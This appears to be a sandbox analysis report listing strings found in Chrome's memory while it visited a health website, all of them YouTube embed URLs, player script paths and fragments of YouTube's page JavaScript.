Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default+ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default+/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484765709.000028EC03728000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX286FD"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXM$ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXdator equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXer( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXlerdler equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXr equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws*! equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws.Other equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsatorr equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdator equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdler7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR31UEST equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRc); equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488324966.000028EC03C88000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?cDRRTQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?oFXXFw equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/generate_204?xfMLzA equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/kmbjdnl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485391480.000028EC037F0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2507031147.000028EC07D2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=h15NcT6UXh0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477065852.000028EC02EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comh.ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comh.capagepfabeoofebfddakdcjhd) anonymous] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https_www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2502516412.000028EC06DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497527553.000028EC04D50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https_www.youtube.com_0@1YtIdbMeta equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https_www.youtube.com_0@1 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: if ('undefined' == typeof Symbol || 'undefined' == typeof Symbol.iterator) {delete Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}EB equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: if(!(f||g||h||m.length||n.length))return;var q={Yi:f,Wi:g,Xi:h,Gj:m,Hj:n,Pf:p,bc:e},r=l.YT;if(r)return r.ready&&r.ready(d),e;var t=l.onYouTubeIframeAPIReady;l.onYouTubeIframeAPIReady=function(){t&&t();d()};A(function(){for(var u=y.getElementsByTagName("script"),v=u.length,w=0;w<v;w++){var x=u[w].getAttribute("src");if(RI(x,"iframe_api")||RI(x,"player_api"))return e}for(var z=y.getElementsByTagName("iframe"),C=z.length,D=0;D<C;D++)if(!II&&PI(z[D],q.Pf))return vc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: iginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: is.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}unction(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(":",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,"error","ad"))&&m.eval(A.createScript("1"))===1?function(g){return A.createScript(g)}:function(g){return""+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w
Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2402229430.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: kFnZW50RGF0YSYmdy5uYXZpZ2F0b3IudXNlckFnZW50RGF0YS5icmFuZHMmJncubmF2aWdhdG9yLnVzZXJBZ2VudERhdGEuYnJhbmRzLmxlbmd0aCl7dmFyIGJyYW5kcz13Lm5hdmlnYXRvci51c2VyQWdlbnREYXRhLmJyYW5kczt2YXIgaT0wO2Zvcig7aTxicmFuZHMubGVuZ3RoO2krKylpZihicmFuZHNbaV0mJmJyYW5kc1tpXS5icmFuZD09PSJGaXJlZm94IilyZXR1cm4gdHJ1ZTtyZXR1cm4gZmFsc2V9fWNhdGNoKGUpe3NldFRpbWVvdXQoZnVuY3Rpb24oKXt0aHJvdyBlO30pfWlmKCF3Lm5hdmlnYXRvci51c2VyQWdlbnQpcmV0dXJuIGZhbHNlO3ZhciB1YT13Lm5hdmlnYXRvci51c2VyQWdlbnQ7cmV0dXJuIHVhLmluZGV4T2YoIkdlY2tvIik+MCYmdWEudG9Mb3dlckNhc2UoKS5pbmRleE9mKCJ3ZWJraXQiKTwwJiZ1YS5pbmRleE9mKCJFZGdlIik8CjAmJnVhLmluZGV4T2YoIlRyaWRlbnQiKTwwJiZ1YS5pbmRleE9mKCJNU0lFIik8MH15dGNzaS5zZXRTdGFydCh3LnBlcmZvcm1hbmNlP3cucGVyZm9ybWFuY2UudGltaW5nLnJlc3BvbnNlU3RhcnQ6bnVsbCk7dmFyIGlzUHJlcmVuZGVyPShkLnZpc2liaWxpdHlTdGF0ZXx8ZC53ZWJraXRWaXNpYmlsaXR5U3RhdGUpPT0icHJlcmVuZGVyIjt2YXIgdk5hbWU9IWQudmlzaWJpbGl0eVN0YXRlJiZkLndlYmtpdFZpc2liaWxpdHlTdGF0ZT8id2Via2l0dmlzaWJpbGl0eWNoYW5nZSI6InZpc2liaWxpdHljaGFuZ2UiO2lmKGlzUHJlcmVuZGVyKXt2YXIgc3RhcnRUaWNrPWZ1bmN0aW9uKCl7eXRjc2kuc2V0U3RhcnQoKTtkLnJlbW92ZUV2ZW50TGlzdGVuZXIodk5hbWUsc3RhcnRUaWNrKX07ZC5hZGRFdmVudExpc3RlbmVyKHZOYW1lLHN0YXJ0VGljayxmYWxzZSl9aWYoZC5hZGRFdmVudExpc3RlbmVyKWQuYWRkRXZlbnRMaXN0ZW5lcih2TmFtZSxmdW5jdGlvbigpe3l0Y3NpLnRpY2soInZjIil9LApmYWxzZSk7aWYoaXNHZWNrbygpKXt2YXIgaXNIaWRkZW49KGQudmlzaWJpbGl0eVN0YXRlfHxkLndlYmtpdFZpc2liaWxpdHlTdGF0ZSk9PSJoaWRkZW4iO2lmKGlzSGlkZGVuKXl0Y3NpLnRpY2soInZjIil9dmFyIHNsdD1mdW5jdGlvbihlbCx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG49eXRjc2kubm93KCk7ZWwubG9hZFRpbWU9bjtpZihlbC5zbHQpZWwuc2x0KCl9LHQpfTt3Ll9feXRSSUw9ZnVuY3Rpb24oZWwpe2lmKCFlbC5nZXRBdHRyaWJ1dGUoImRhdGEtdGh1bWIiKSlpZih3LnJlcXVlc3RBbmltYXRpb25GcmFtZSl3LnJlcXVlc3RBbmltYXRpb25GcmFtZShmdW5jdGlvbigpe3NsdChlbCwwKX0pO2Vsc2Ugc2x0KGVsLDE2KX19KSh3aW5kb3csZG9jdW1lbnQpOwo=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: kejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.js0(-2517715832659448638.6270065637815208423differentDocumentE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRrupalSettings = JSON.parse(settingsElement.textContent); equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: l.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: lRpbWVNczogIDQzLjAgfSwgJycpO30=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: n false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: n(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
